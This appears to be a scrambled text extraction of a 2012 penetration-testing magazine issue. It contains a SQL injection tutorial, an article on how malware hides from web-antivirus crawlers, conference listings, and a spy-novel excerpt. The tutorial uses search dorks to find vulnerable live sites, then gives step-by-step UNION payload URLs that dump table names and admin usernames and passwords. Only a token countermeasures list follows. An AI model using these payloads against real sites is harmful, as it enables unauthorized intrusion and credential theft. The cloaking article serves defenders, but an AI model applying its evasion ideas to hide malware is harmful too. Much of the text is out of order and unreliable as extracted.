Web Application Vulnerability: MySQL Attack on Website

Database

MySQL Attacks are an often used technique to attack databases through a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database.

Figure 1. SQL tables view

BASICS


identified by a number. When you click on a link to an article, you are usually able to see the number of the article you clicked on by looking at the URL of the page you are on.

• When you click a link like this, www.abcd.com/love.php?id=10, the link tells the site to look in the table that stores the article names for an article where „love.php” is 10.

• It is important to realize that what is typed after the „=” sign in the URL is part of an SQL command (Figure 3).

An information schema view is one of several methods SQL Server provides for obtaining metadata.

• The INFORMATION _ SCHEMA holds the names of every table and column on a site.

• On every SQL server there will be an INFORMATION _

SCHEMA and its name will never change.• The table in the INFORMATION _ SCHEMA that holds the

names of all the other tables is called INFORMATION _

SCHEMA.TABLES.• The name of the column that holds the information

in INFORMATION _ SCHEMA.TABLES is called table _ name.• The table in the INFORMATION _ SCHEMA that holds

the names of all the other columns is called INFORMATION _ SCHEMA.COLUMNS.

• The name of the column that holds the information in INFORMATION _ SCHEMA.COLUMNS is called column _ name (Figure 4)

MySQL Attack In MYSQL DatabaseMySQL Attacks are an often used technique to attack databases through a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database.

Checking for vulnerabilityFor finding the vulnerable website type the following in Google or any Search Engine: Inurl:.php?id= ,inurl:.php?product_id=.

Step 1Suppose you got a site like: http://www.abcd.com/love.php?id=10.

Step 2Check if it is vulnerable. You would simply add ‘ in the end of the URL so the resulting URL will be: www.abcd.com/love.php?id=10’.

If the site is not vulnerable, the page loads normally. But if it is vulnerable than it will show you Error like:

link or page header. Tables have columns in which the records (information) are kept. Each table has a name and each column has a name (Figure 1).

How SQL Works?Before we can perform an injection, we must first understand how SQL works.

• When you register a new username and password on a website, the username and password you entered is kept in the site’s member table; the username and password are put in their separate columns (Figure 2).

• When you log in with the username and password you registered, the login page looks for a row in the member table that has the same username and password that you supplied.

• The login form takes the conditions that you supply, and searches the member table for any rows that satisfy those conditions.

• If a row exists that has both the same username and password, then you are allowed to go on your account.

• If no row is found, the login page will tell you that the account you specified does not exist, or that your username and password is wrong.

• SQL can also display information on a website. If a site has a news section, there may be an SQL table that, for example, holds all of the article names. More often than not, articles on a website are

Figure 2. User registration

Figure 3. Some SQL Commands

BASICS

http://pentestmag.com05/2012(7) 05/2012(7)

ErrorYou have an error in your SQL syntax; check the manual

that corresponds to your MySQL server version for the

right syntax to use near ‘\’’ at line 1. Even if the

content of the page changes than it is also vulnerable,

so closely observe the page.

Step 3Find the number of columns. For finding the number of columns, use the ORDER BY command. Suppose the url will look like:

www.abcd.com/love.php?id=10 order by 1-- (No error)

So let’s increase it to 2:

www.abcd.com/love.php?id=10 order by 2-- (No error)

Keep on incrementing the order by clause by 1 until it gives the error. In this case we got the error at www.abcd.com/love.php?id=10 order by 4--. So it means there are three columns.

Step 4Find which column contain data of our interest. For this we will use the UNION command. We Have 3 columns: www.abcd.com/love.php?id=-10 union all select 1,2,3--.

NoteCheck the URL I have used negative mark after id=.This is done to display only the column name and not the dynamic content like picture or etc.

Observe the page you will see the column number displayed. There may be more than one number but its fine you can use any one from them.

In this case we got the 2.

Step 5Checking the database version. We will use the @@version for this. Since we got the column number 2 our query will be:

www.abcd.com/love.php?id=-10 union all select 1,@@version,3--

Step 6Getting the right table name from information_schema (Read information Schema

Topic).www.abcd.com/love.php?id=-10 union all

select 1,table_name,3 from information_

schema.tables--.This query will display the entire table

name in the database. Sometimes there are not enough places to display the entire table name so it will display only one table name.

In this case we will use limit 0, 1 such as: www.abcd.com/love.php?id=-10 union all select

1,table_name,3 from information_schema.tables

limit 0,1--.

Figure 4. Information schema

Figure 5. Finding vulnerable websites

BASICS

Page 20 http://pentestmag.com05/2012(7) 05/2012(7)

Keep on incrementing limit by 1 such as limit 1,1 limit 2,1 until we get the desired table name. If you had to use unhex(hex()) while finding version, you will have to do: unhex(hex(table_name)).

Suppose in our case the the desired table name is admin.

Step 7Getting all the column names of the table which we got in step 6.

Similarly for the column name our query will look like: www.abcd.com/love.php?id=-10 union all select 1,column_

name,3 from information_schema.columns where table_name=ch

ar(97,100,109,105,110)--.Remember convert the table name into its equivalent

ASCII. Here 97,100,109,105,110 is the ASCII of admin.Suppose we got the column name: id, username, and

password.

Step 8Extract the data from the table. Now we will get the data of the respected column from the table.

Our query for username is: www.abcd.com/love.php?id=-10 union all select 1,username,3 from admin--.

This will give the username rights of admin.Our query for password is: www.abcd.com/love.php?id=-10

union all select 1,password,3 from admin--. This will give password in plain form or sometimes in

md5, sha1 hash such as 819bed5b34b02ccb68ab69ab2055b.You have to decrypt it. To decrypt Google it.

To combine the data of all columns in one query we will use the concat function such as following: www.abcd.com/love.php?id=-10 union all select 1, concat(id,0x3a,usernam

e,0x3a,password),3 from admin--.

Countermeasures against MySQL Attacks

1. Install the GreenSQL it is like a database firewall.2. Do not use MySQL root user to access the

database.3. Revoke FILE permission from the MySQL user

used in your applications.4. Application Code Review. u

References• www.wikipedia.org• www.owasp.org• www.google.com

OOPPSSMr. Ooppss, Cyber Security Analyst, i3indya Technologies

16th INTERNATIONAL SECURITY AND RFID EXHIBITION16th INTERNATIONAL FIRE,EMERGENCY RESCUE EXHIBITION

SMART HOUSES AND BUILDING AUTOMATION EXHIBITION

OCCUPATIONAL SAFETY AND HEALTH EXHIBITION

INFORMATION, DATA AND NETWORK SECURITY EXHIBITION

The Most Comprehensive Exhibitionof the Fastest Growing Sectors of recent years

in the Center of Eurasia

SEPTEMBER 20th - 23rd, 2012 IFM ISTANBUL EXPO CENTER (IDTM)

THIS EXHIBITION IS ORGANIZED WITH THE PERMISSIONS OF T.O.B.B.IN ACCORDANCE WITH THE LAW NUMBER 5174.

http://www.wikipedia.org

http://www.owasp.org

http://www.google.com

http://www.isaffuari.com/

WEB APP


I ’ve examined the next web antiviruses: Web Virus Detection System, Google, Yahoo, Yandex, Norton Safe Web, McAfee SiteAdvisor, StopBadware. And

every web antivirus can face with malware’s attempts to hide from it (so malware will left undetected and continue to infect visitors of web sites). In this article I’ll describe methods of bypassing of web antiviruses, which developers of such system need to take into account to prevent possibilities of malware to hide from them.

Bypassing of systems for searching viruses at web sitesIn May 2010 I’ve published the article to The Web Security Mailing List Archives [3] about bypassing systems for searching of viruses at web sites. This concerns all systems for searching of viruses at web sites, including search engines with built-in antiviruses, which have no counter-measures against it.

Bypassing systems for searching of viruses at web sites is possible with using of cloaking (which is known from 90s and is used for hiding from search engines bots for SEO purposes). When User Agent is analyzing and if it’s a search engine, then malicious code is not shown, if it’s a browser – then shown. So the same cloaking which used for SEO, can be used for malware spreading and hiding from systems for searching of viruses at web sites. Particularly from search engines

with built-in antivirus systems, because they are using bots of search engines with known user agents.

I saw the using of cloaking method in malicious scripts many times during my researches since 2008. Particularly I saw checking of Referer (and similar approach can be used for User-Agent). And these method of protection of malicious code from systems for searching of viruses create serious challenge for these systems.

Antivirus companies and other security researchers are also sometimes finding cases of using cloaking against search engines with built-in antiviruses. Example: in May 2010 many web sites on shared-hosting at DreamHost and other hosting providers were hacked and infected with malicious code, and the code for distributing of malware was using a cloaking for hiding itself from built-in antiviruses in search engines Google and Yahoo.

Effective use of cloaking against web antivirusesIn the end of August 2011 I’ve found that Google started using User-Agent spoofing for its bots. Which can be concerned with the desire to improve their system for searching viruses at web sites – so with using of cloaking (UA spoofing is type of it) to decloak viruses at web sites.

But it uses spoofing ineffectively and with considered use of cloaking the malware can effectively hide from

Bypassing Web AntivirusesAt beginning of April 2010 I’ve made the testing of systems for searching of viruses at web sites [1]. In my research I have examined different systems for searching of viruses at web sites, as standalone, as built-in the search engines – these systems can be called as web antiviruses. And later I have presented my results of testing of web antiviruses on conference UISG and ISACA Kiev Chapter #6 [2].

WHOIS in real-time) by which it will be hiding itself from these bots. So effective cloaking works simultaneously on three parameters: User-Agent, IP and DNS. And these are well known things in world of cloaking, about which security vendors should know.

ConclusionIn the article I have described different methods, which allow to bypass web antiviruses. And web antiviruses should take them into account for opposition to malware.

For effective cloaking at web sites malware can analyze User-Agent, IP and DNS. So developers of web antiviruses, including search engines with built-in antiviruses, need to take it into account to effectively fight with malware. Because in this Game of Masking only well hidden web antivirus can reveal hidden malware. u

the Google’s bots and from bots of any search engine, including those systems, which have built-in antiviruses. Now these are Google, Yahoo, Bing and Yandex.

When earlier, Google’s bot named itself in User-Agent header as “Googlebot” (i.e. “Googlebot/2.1”), I found that it sometimes named itself as “MOZILLA 5.0”. From one side it can help to decloak hidden malware at the sites, but from other side this is not enough. Because advanced malware can check not only User-Agent, but also check IP and do reverse DNS lookup.

Particularly for this bot the IP was equal 66.249.66.102, and domain – crawl-66-249-66-102.googlebot.com. Which via IP resolving can be determined that it’s exactly Googlebot. And even if it creates another domain name, the WHOIS records will mention that this IP belongs to Google, then malware can use this information to create IP list (or to make request to

References[1] Testing of systems for searching of viruses at web sites

(http://websecurity.com.ua/articles/test_webvds),[2] Systems for revealing of infected web sites (http://

websecurity.com.ua/uploads/articles/speech-2011.swf ),[3] New vulnerability in bots of search engines (for security

bypass) (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-May/006512.html).

EUGENE DOKUKIN AKA MUSTLIVEEugene Dokukin has over 17 years experience in IT and programming. He is also specialist in web developing and web security. His prime areas of work are programming, web developing and web security. Now he is working as private auditor of websites and web applications. Email: [email protected]

a d v e r t i s e m e n t

http://websecurity.com.ua/articles/test_webvds

http://websecurity.com.ua/uploads/articles/speech-2011.swf

http://websecurity.com.ua/uploads/articles/speech-2011.swf

http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-May/006512.html

http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-May/006512.html

mailto:[email protected]


http://www.workbooks.com

CLOSE-UP


June 3 – 6, 2012, Techno Security 2012 & Mobile Forensics 2012 VIP Invitation for PenTest Magazine readers [FREE VIP registration]

data: June 3 – 6, 2012

title: Techno Security & Mobile Forensic (two events)

organizer: TheTrainingCo.

keywords: mobile devices forensic, digital investigations, multiple trainings

place: Myrtle Beach, SC, USA

description: This will be the 14th year for Techno Security and the 5th year for Mobile Forensics. Frequent attendees are some of the top practitioners in the world in the fields of Information Security, eDiscovery, Mobile Forensics, Digital Forensics and Technical Business Continuity Planning. Last year, there were over 1,000 people registered. Techno Security 2012 will include several sessions as well as pre-conference and post-conference events. You may choose between courses concentrated inter alia on Smart Devices, issues of Flasher Box and JTAG, Python Scripting with UFED Physical Analyzer and other trainings addressed to both advanced and inexperianced users. For full range you mast visit website.

official page: www.techsec.comif from pentest: free VIP registration [email protected]

Conferences in 2012

Programmer is a constantly undereducated person. Being up to date with the latest trends and solutions often decides if you are seen as a top-shelf coder. We are presenting conferences where all the new trends are mixed and exchanged between groups and individuals in vivid and revitalizing atmosphere. And where you can shine with your knowledge.

Figure 1. Golf tournament at this golf course is an additional option

http://pentestmag.com/techno-security-2012-mobile-forensics-2012-vip-invitation-for-pentest-magazine-readers/




http://www.techsec.com/


CLOSE-UP


June 27 & September & December, The Amphion Forum 2012Recommended!

data: June 27 and September 2012 and December 2012

title: The Amphion Forum

organizers: Codenomicon, Mocana

key-words: interdisciplinary, electronics, smartphone, defense electronics, aviation, app

place: Washington DC; San Francisco CA; Seul, South Korea

description: One of the biggest conferences every year. It’s the only event focused on the security of the billions of devices that already outnumber PC’s on the network by 5 to 1. You’ll learn about security for mobiles and tablets and also security for smart grid, medical devices and industrial automation. Amphion is exclusive, interdisciplinary and intense. Meet the crypto architects and the device business leaders making the Internet of Things a reality. And find out what’s yet to come, quarters before your competition. The Amphion Forum brings together thought-leaders from academia, business, government and tech to discuss the threats – and opportunities – presented by the unprecedented proliferation of connected devices.

official page: www.amphionforum.com

July 22 – 25, SharePoint Technology Conference, in Boston

data: July 22 – 25, 2012

place: Boston, Canada

title: SharePoint Technology Conference

organizer: BZ Magazine

keywords: SharePoint environment

description: It is the world’s premier independent event for Microsoft Office SharePoint. The format includes 90+ technical classes, workshops and breakout classes with content geared to IT professionals, business managers and developers. It features top Microsoft MVPs, dozens of expert MS speakers and solutions from 50+ exhibitors

official page: www.sptechcon.com/boston2012

Figure 2. The Westin Copley Place, place of training

http://pentestmag.com/the-amphion-forum-2012/

http://pentestmag.com/the-amphion-forum-2012/

http://www.codenomicon.com/

https://www.mocana.com/

http://www.amphionforum.com

http://pentestmag.com/sharepoint-technology-conference-july-22-25-in-boston/

http://pentestmag.com/sharepoint-technology-conference-july-22-25-in-boston/

http://www.sptechcon.com/boston2012

CLOSE-UP


ISAF IT Security 2012 September 20th – 23rd

data: September 20 – 23, 2012

title: ISAF IT Security 2012

organizer: ISAF

key-words: not advanced users

place: Istambul, Turkey

description: Addressed to those who want increase share in local market as there are some local brands involved. The conferences on general security, safety&health and smart housing are being held at the same time. In 2012 IT Security Exhibition covers the themes of Information Security, Data Security, and Network Security which are today the most important part of security.

official page: www.isaffuari.com

26-28 September 2012, Russia’s No. 1 IT & Security Event


title: Russia’s No. 1 IT & Security Event

organizer: infosecurity

key-words: cloud, mobile, Free Software for Enterprises, infosecurity, ICT, local market

place: Crocus Expo, Moscow, Russia

description: The VIII International InfoSecurity Russia, StorageExpo & Documation Show 2011 targets users’ needs, educational content being the main concern of the event organizers. The show presents the experience of the biggest Russian and global suppliers of information security products and solutions.

official page: www.eng.infosecurityrussia.ru

Figure 3. Last year conference

Figure 4. Crocus Expo in Moscow

http://pentestmag.com/isaf-security-fire-safetyhealth-it-security-smart-houses-2012-in-istanbul-turkey/






http://www.isaffuari.com

http://www.eng.infosecurityrussia.ru

CLOSE-UP


26-29 September, nullcon [30% discount on conferences pass up to two persons]Recommended!

data: June 3 – 6, 2012

title: NULLCON, The International Security Conference

organizer: Null – The Open Security Community

key-words: information security

place: Delhi, India

description: Exposure to the latest in information security, new attack vectors, solutions to complex security issues. Experience practical scenarios, thought provoking ideas and research from the luminaries in the global IT security industry. Benefit from the unique appeal of global flagship event which attracts national and international visitors, thus ensuring large numbers of international contacts and collaboration worldwide. Exclusive null Job fair enables organizations and professionals to find the right fit for each other.

official page: www.nullcon.net

if from pentest: 30% discount on conference pass up two [email protected]

27th-28th September, 2012, Houston, Texas Cyber Security for Chemical IndustryInteresting


title: Cyber Security for Chemical Industry

organizer: Qatalyst Global

key-words: chemical industry,

place: Houston, Texas

description: The Cyber Security for Chemical Industry Europe will bring together leading c-level practitioners and senior IT Security Managers from across Europe to discuss how you can ensure that your business is not vulnerable to attack. Attend this event to benefit from unrivalled benchmarking and networking opportunities with other peers in the industry. Hear first-hand from other CIOs and CISOs how they are preventing against cyber threats and discover the latest research and development and how it will impact your business in the coming months.

official page: www.cybersecurity-chemicals.com

Figure 4. Hotel Leela Kempinski, Delhi

http://www.nullcon.net/website/

http://www.nullcon.net/website/

http://null.co.in/

http://www.nullcon.net

http://pentestmag.com/cyber-security-for-chemical-industry/






http://www.qatalystglobal.com/

http://www.cybersecurity-chemicals.com

CLOSE-UP


October, 1-3, SecTor – Canada’s premier IT Security Education Conference

data: October 1 – 3, 2012

title: SecTor – Security Education Conference

organizer: TASK

key-words: cloud security, forensics, governance, risks, compliance

place: Toronto, ON, Canada;

description: An annual event where IT professionals from throughout Canada can learn from and network with the world’s most innovative, intellectual, exciting and entertaining security professionals. SecTor is IT Security Training at its best – plan to join us October 1-3, 2012 at the Metro Toronto Convention Center.

official page: www.sector.ca

if from pentest: freeusers: 10% off registration subscribers: 10% off registration + free registration to ‘PenTest-Expo2012 Please write to: [email protected]

October 22-24, 2012, San Francisc, WpDevConRecommended!

data: October 22 – 24, 2012

title: The Windows Phone Developer Conference

organizer: BZ Media

key-words: windows phone, tools, integration with cloud

place: San Francisco, CA

description: The first WPDevCon: Windows Phone Developer Conference is the independent conference for software developers, marketers and entrepreneurs building applications for Windows Phone-powered smartphones. Windows Phone is poised for take off with Microsoft putting the engines on full power in 2012. Projected attendance is 500+ from across the globe. Exhibits admission is free! Windows Phone is about to take off. Microsoft is putting the engines on full power – and this is one flight you won’t want to miss. With dozens of technical classes, workshops and keynotes 100% focused on building and selling Windows Phone apps, this may be one of the most important educational and networking opportunity in 2012.

official page: www.wpdevcon.net

discount: Receive a $100 discount off the prevailing rate for the 3-day pass by inserting the code MEDIASPONSOR when prompted on the eRegistration page linked from www.wpdevcon.net u

Figure 5. Conference room at recent SecTor

http://www.sector.ca

http://www.wpdevcon.net/

http://www.wpdevcon.net/

http://www.bzmedia.com/aboutus.htm

http://www.wpdevcon.net

http://www.wpdevcon.net

��

CloudPassage Halo is the award-winning cloud server security platform with all the security functions you need

to safely deploy servers in public and hybrid clouds. Halo is FREE for up to 25 servers.

cloudpassage.com/pen

http://www.cloudpassage.com/pen

CYBER STYLETTO


Stokes turned right, down a cramped aisle into the coach section of Air Asia charter flight 711, a non-stop to Macau packed with people eager

to try their luck at the MGM. Yvonne smirked as he shook his head over the seat he’d been assigned, in the middle of the last row. He wouldn’t even be able to lean back during the ten-hour flight with the bulkhead behind him. He turned to make sure she was following him, and saw she was not.

“Where are you going?” he asked.

She smiled. “First class, of course.”Buck, Woody and the others all headed left, holding in their laughter. “Them too?” Stokes said.

“We always fly up front.”

He took the crumpled boarding pass and waved it at her. “Then what am I doing with this?”

“Rohan, darling. I tried. But by the time I knew you were coming it was too late to get you a first class seat,” she said.

He turned to go back to the gulag of the last row, then stopped.

“Wait a minute,” he said. “When I showed up, you hadn’t even made your plans for this trip. You just did this to spite me.”

The queue of passengers loading up behind Stokes as he blocked the aisle began to get restless. An old woman pushed her carryon into his leg. She blurted something in Chinese. He didn’t know the words, but Yvonne could see he understood her meaning as he dropped his head and started walking back. In Macao the group had to wait almost a half hour for Stokes to disembark, since literally everyone else on board was in front of him.

Yvonne had considered leaving for the hotel without him, but he’d only track her down through her cochlear implant, and she was getting tired of that. He came up the tunnel looking as though he’d been flying in a laundry hamper – his jacket and shirt were wrinkled, and one pant leg had risen high enough to show a stretch of bare shin above his sock, and was held in place by static cling.

Cyber Styletto

7 a.m., Sunday, San Francisco International Airport

��

��

��

��

��

��

��

��

��

��

CYBER STYLETTO


“Knew him in Iraq during Desert Storm,” Stokes said. “Tank man. One of the few to fight there and in Nam. Toughest son of a bitch I ever met.”

“Met Lu at Doug’s funeral,” Buck said. “We brought him on a couple of years after, when I saw him win a martial arts tournament in Thailand.”

“Sorry to hear that your dad passed away,” Stokes said. “ He was the last of a breed, if you ask me.”

While Stokes cemented his relationship to Buck and the rest of the team, Yvonne pulled out her laptop and started typing. There was a Chinese spy satellite in synchronous orbit over Hong Kong from which she might be able to get images from the airport. The warehouse that stored Network Systems computers assembled in China was nearby, and if she could locate it, they could create a map of how best to execute both her mission and Buck’s simultaneously.

The limo quieted as she worked. “No,” she said. “Keep talking.

Don’t let me kill the conversation because I have some work to catch up on.”

She nodded towards the driver. Pansy Po may trust him, but Yvonne could not afford that luxury. In Macau, she knew, everyone had a price – even Pansy’s driver could be working both sides.

The others traded more gambling and war stories while she hacked away. Finding a signal from the satellite was the easy part – she knew from experience what wavelengths the Chinese – and most other sovereignties – used regularly. But what encryption keys might be employed this week were anyone’s guess. She launched a search program, but it might take some time to unlock it – her laptop was nowhere near as powerful as the computers in her lab, and it crunched the numbers like it. She might have to continue the process in the hotel room, which was riskier, since the longer it took to complete the task, the better the chance her activity might show up on People’s Liberation Army security agency scans. A stationary target was easier to locate.

Stokes saw what she was doing and leaned in. He whispered, “CyberCom intelligence says they’re using one of the Jinzhong protocols. You might narrow your search there.”

She switched to CyberCom’s private communications channel and accessed a secret folder. It listed

“You get into a fight back there, Stokes?” Colin said.

“I think I was stuck between two sumo wrestlers,” he said.

Maybe the rough treatment had been too much. Yvonne hadn’t anticipated his seatmates being Woody’s size. “Sorry,” she said. “I got a little carried away with the joke.”

“I had it coming,” Stokes said. “I put you on the spot back in San Fran.”

“And a few other places,” she said.

A stretch limo met them outside the terminal to take them to the MGM. “Pansy Po,” Yvonne explained as they got in. “We’re old friends. I told her we were coming.”

“Nice to have friends like that,” Nigel said.

“Listen,” Yvonne said. “Pansy will show us a great time tonight while we get ready for the job. But you need to promise not to win too much at the tables. It kind of makes her mad if she thinks she’s paying at both ends. Just think of it as another way to handle the bill.”

Silk smiled at her. “You don’t have to worry,” he said.

“Why not?”

“Three decks, shuffled every other hand,’” Buck said. “Silk had to stop counting cards after most of the houses changed their strategy. He was one of the best blackjack counters in the business before he joined our team.”

“Father taught me in Manila,” Silk said. “I clean up there too.”

“Now he just bets the animals,” Woody said.

Stokes looked up. “Animals?”

“Horses, dogs… the occasional rooster.”

“That’s where big money is anyway,” Silk said. “Better odds.”

“Your father was Doug Boland, wasn’t he?” Stokes asked.

“Yes. You know him?”

CYBER STYLETTO


protocols intelligence had uncovered in the previous month. She typed in a few more commands to go in that direction. Within a minute the program had given her access to the satellite’s output and functionality. It was currently relaying images from a military installation in Taiwan.

“The bastards,” Stokes said. “That’s a violation of international sovereignty.” He smiled at Yvonne, to acknowledge that she’d be doing the same thing.

Yvonne changed the coordinates to position the camera to Hong Kong International and the satellite responded.

“I can’t do this for very long before they realize what’s going on. Maybe just a few seconds,” she said. “So I’m gong to have to take get wide angle shots.

As long as we can blow them up later, they’ll be fine.”

“This is the first time I’ve ever hoped their resolution was as good as ours,” Stokes said.

She downloaded images for fifteen seconds, and then disconnected the link. “Glad we were able to do that while we were moving. I hope it’s enough to tell us what we need.”

“If not we can always take a taxi together and try again.”

Yvonne rolled her eyes at Stokes to let him know it was another nice try that wasn’t going to work.

Pansy met them at the hotel. Thanks to her history in the casino Yvonne was given a million dollar limit at the tables. Each of the men was allowed fifty thousand, plus bar privileges, which made them visibly happy. For accommodations, the men were doubled up in ground floor villas. Buck and Nigel volunteered to room together in what they called the “seniors suite.”

“You know how early we elders have to get to bed,” Nigel joked. Colin and Silk, being the youngest, paired off. “Great,” Colin said. “There’s an Armageddon Squadron tournament I can play in while we’re here.”

That left Stokes and Woody. Stokes took another look at the big man and said, “If there’s only one bed in that room I’m in a lot of trouble.”

Yvonne was given a penthouse. She and Pansy dismissed the rest of the crew, and went off for a brief

tour, and then to the owner’s private office. If Buck had missed anything in decorating his place back in San Francisco, Pansy had it here…and more. The furniture, she explained, was all handcrafted. Hardwoods from South America, Macael marble from the quarries in Spain. Yvonne sat in a Reitveld chair and sipped a twenty two-year single malt. Pansy sat and draped her hands, heavy with jewels, over the arms of her chair. Against the royal backdrop, she looked something like an empress from one of the dynasties. It was not too far from the truth – she and her family had created a new ruling class, even among the supposed socialism of the Chinese state.

“You’re quite the host,” Yvonne said. “I feel guilty coming here to ask for a special favor.”

“I always show my friends the best times. Besides, I am still in your debt for saving the casino’s network. Anyone else and I’m sure we would have been hacked by gangsters. What I spend to entertain you and your friends is just a fraction of what that would have cost me.”

“In that case,” Yvonne said, sipping her Scotch, “I need a few things for that project I mentioned in my message. You still have your munitions connections, I assume.”

“In this business, I have to,” she said. “But I thought you didn’t like guns.”

“I don’t. But this job has some special risks. I don’t always go on location to do my work. I usually snoop long distance, where the bad guys can’t touch me.”

“Something here in Macao?”

Yvonne explained the logistics of her search. “We landed here first because I have to sneak into Hong Kong. I may still be on their list of suspects wanted for questioning. Besides, I needed someone I could trust to help with this equipment.”

“Got your shopping list?”

“A van, for starters,” Yvonne said. “With the logo of the Cathay ComputerWorks on the side. And then some weapons – enough for

six.”

“I can get you some Uzi-Pro. They have a polymer pistol grip. Your boys will love them. I’ll see about some explosives too.”

CYBER STYLETTO


“Oh, I don’t think we’ll need that.”

“You better take them along. And I’ll see you get some night vision goggles. Best to poke around when it’s dark.”

“Are you sure?”

“You computer nerds are all alike,” Pansy said. “Never think about the physical danger. You’re lucky you have me on your side, Yvonne. Brains and beauty – we still make a good team.”

“Wait a minute,” Yvonne said. “Brains and beauty? What’s left for you?”

Pansy laughed and hugged her. “You have brightened my week,” she said. “I’ll make sure everything is waiting for you when you get to Hong Kong. But now, come on, let’s have some fun before you have to leave.”

They started for the casino when Pansy stopped and put her hand on Yvonne’s shoulder. “Speaking of special risks, there’s one more thing you should know.”

Yvonne lifted an eyebrow.

“Shi is in Hong Kong too,” Pansy said.

“Does he know I’m coming?”

“No. But I wanted you to be on guard. Ever since Hong Kong went back to China he’s had a thing for harassing foreigners there.

His men are always looking to make trouble. You show up with your team and someone’s sure to notice.”

“Thanks. I’ll have the boys split up on the ferry so

we’re not so obvious.”

They walked into the casino and paused to survey the action. Yvonne looked for the team members, but Pansy stopped and fixed her gaze on Colin, who was trying his luck on the slots.

“Yours?” she asked.

“Just a plaything.”

“May I borrow?”

Yvonne led Pansy over and introduced her.

“Having any luck?” Pansy asked him.

“Not a bit. These things aren’t rigged, are they?’

“Totally fair,” she said. “But slots is for children. Come with me and I’ll show you an adult game.”

“Like…?”

“We’ll start with baccarat. After that, who knows?”

Colin shot a look at Yvonne, as though he might offend her by going off with Pansy. Instead she wanted to thank her friend again, but to say it in front of him would be rude.

“I don’t mind at all. Go ahead,” she said. “Get yourself an education.”

Pansy winked at her, confirming that the young man would no doubt learn a few things in the course of the evening. In the morning the team met in Yvonne’s suite to go over photos of the airport. “We’ve had our fun, gentlemen,” Buck told them, “but now it’s time to prove we deserve the big money. This mission is going to be tougher than usual. Not only do we have to avoid the usual airport security, but our repo target is connected to the government, and has his own people. We don’t know whether they’ll be in proximity when we move to take the Boeing, so we’re going to have to do recon before we can move in. It’s one thing to take a plane from a corporate hangar. Taking one from a member of the Chinese government is something else.”

“This has international incident written all over it,” Stokes said.

“Any connection to U.S. government operations would be a disaster for CyberCom and NSA.”

“That means you have to stay as far in the background as possible, Stokes,” Buck said.

“And then there’s my little project,” Yvonne said. “I need to get into the Network Systems warehouse and examine a few of their servers to determine if this is where the Mandarin chip is being added.”

“Exactly. We need to coordinate all this.”

Yvonne spread satellite photos that Pansy had printed for her over the coffee table. The resolution was not as

CYBER STYLETTO


sharp as she had hoped, owing to the small window of time she had to download them before Chinese authorities caught on to her activities. The Network Systems warehouse was in among a block of industrial buildings in a remote area. It was at least a half mile from the hangar that housed the 777, and she could not be sure which structure, exactly, was the one she sought.

“So it’s not going to be easy,” Buck said. “Our best plan is to recon the warehouse and the jet during the day, and make our move in the wee hours.Woody can go with Yvonne for protection, and we’ll take Colin to compensate.”

When they were done with the preliminary logistics, Yvonne slipped the photos into her briefcase. “Pansy tells me Hong Kong is crawling with Chinese intelligence these days. We’re going to have to be extra careful.”

“Shi Tao?” Stokes asked.

“Yes. My old friend from MIT.”

“And my counterpart in espionage at PLA. It’s hard to believe he learned everything he knows in America, and then took it back to China to work against us.”

“The American way,” Colin said. “Give our enemies access to our secrets and then act surprised when they use it.”

“I’ve always had a thing for him,” Stokes said. “Maybe we’ll get to finally meet.”

Yvonne held her emotions inside. She’d had a thing for Shi when they were back at MIT, too. He’d been as smart as she when it came to computer theory. And he’d been able to hide his motives the entire time they were together.

“Listen,” she said. “When we land in the city we have to split up.

We can’t just have six American commandos…” She looked at Stokes. “Make that five… walking down the street together.”

“Best let me go by myself,” Silk said. “I blend in better than the rest of you.”

Yvonne wasn’t sure. He was only half Asian, and the half that was his father seemed pretty obvious. But

Buck had said Silk knew how to hide himself, and she trusted that opinion.

She and Colin would pretend to be a couple again. Buck would pass as her dad, Nigel as his.

That left Stokes and Woody to team up. Woody looked Stokes over like he was choosing a ripe tomato. He paused, took a deep breath, and said, “You think people will really believe you’re my bitch?”

Everyone broke up, except for Stokes. When the meeting was over Yvonne decided to disguise herself before the ferry to Hong Kong. She wanted no part of Shi Tao. Their time together had been difficult. He was jealous, vindictive, and a nightmare of competitiveness. Even when they were dating he made every class assignment a personal battle between them to see who was better at writing and hacking code. It was because of him she almost gave up her career before it started.

It wasn’t even a class assignment, but a dare. Yvonne boasted she could infiltrate secure systems faster than he, so he made her prove it. The elevators in the Langham Hotel had just been converted to a computer system that had improved their efficiency thirty-five percent. It had been in the Globe. The system figured out how long it would take each car to respond to a call, and sent the one that would get there first.

“We’ll screw them up,” he said. “Take the whole system down.”

He was more malicious than she had imagined. But she couldn’t resist the competition. She had to beat him. She decided she would get in, send a car or two to the wrong floor, and get out. No one would even realize she’d done it. They raced to see who could hack in first. They sat, brazenly, in the lobby and typed away.

“I’m in!” she said, just a moment before he said the same thing. The next step was to prove she had affected the system. But in her rush to win she forgot her plan to divert the cars – there just wasn’t time. Instead she simply pulled the plug on the entire system. As did Shi. They both yelled, “Done!” at the same time.

They laughed and pushed at each other playfully. No one could tell who had actually reached the system controller first, so this one would have to be declared a tie. But Yvonne stopped laughing right away. Paramedics had been called to the lobby. There were

CYBER STYLETTO


people trapped in the elevators. “Don’t worry,” Shi said, “they’ll figure it out in plenty of time.”

Except that one of the people on an elevator was an old man who had suffered an attack of angina. His wife was bringing him down to meet the medics. Now they were in between floors. Yvonne could almost hear her screams for help into the emergency phone.

By the time the hotel techs were able to access the car and reach the couple, the old man had gone into cardiac arrest. He died on the way to the hospital. Maybe if they hadn’t been playing with the system he would have made it. Maybe Shi had been the one to pull the system’s plug. Did any of that matter? She knew it didn’t. Shi couldn’t care less.

His number was up,” he said when he learned what happened. For him, it was all about being on top, no matter who got in the way. They didn’t see each other after that; didn’t even speak again until graduation. And since then she had promised herself – no violence, nothing that could inflict anything more than financial harm.

Knowing Shi, he’d given her picture to every security agent under his command, and she’d be picked up the minute she showed her face. She had to do something about that.

She took her hair and fixed it into a ponytail, then stuffed it under a coolie hat she bought the night before, after she’d met with Pansy. She chose her most unremarkable outfit from the clothes she’d brought – baggy jeans and a tan blouse – and added a large pair of tourist sunglasses. Still she was afraid it was not enough. Someone would recognize her. Most of her missions had been conducted in the safety of cyber space. This time she’d have no firewall to protect her.

A knock on the door startled her. Stokes said he’d left his pen on the table. When she let him in it was his turn to laugh.

